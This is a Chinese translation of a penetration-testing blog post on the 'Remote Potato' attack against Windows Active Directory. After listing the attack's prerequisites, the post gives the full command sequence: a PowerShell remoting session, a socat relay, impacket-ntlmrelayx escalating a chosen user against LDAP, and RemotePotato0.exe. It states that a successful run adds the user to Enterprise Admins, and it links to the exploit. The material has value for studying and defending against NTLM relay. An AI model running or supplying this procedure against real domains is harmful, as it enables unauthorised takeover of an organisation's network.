Remote Potato – From Domain User to Enterprise Admin

本文为翻译文，如有需要可查看原文：

https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/

前言

如需复现该漏洞，我们需要开启PS远程管理，开启方法如下

Enable-PSremoting
set-item wsman:localhost\client\trustedhosts -value

可以使用下面的命令来查看我们的目标配置：

Get-PSSessionConfiguration

如有需要，可将指定用户加入到指定组中：

所以该攻击的前提为：

1. 具有Domain Administrator特权的用户实际上已登录到主机或通过远程桌面登录
2. 攻击者已获得对主机的初始访问权限，或者已通过WinRM或SSH访问
3. LDAP和SMB签名未配置

复现

首先使用下面的命令与目标主机建立链接

Enter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)

然后使用socat 进行转发：

sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &

然后进行中继

 impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab

然后在目标机器上执行remote potato

RemotePotato0.exe -r 10.0.0.3 -p 9998

若成功则用户会被加入到Enterprise Admins组

此时便可以使用任何的横向移动工具获取system权限：

exploit地址：https://github.com/antonioCoco/RemotePotato0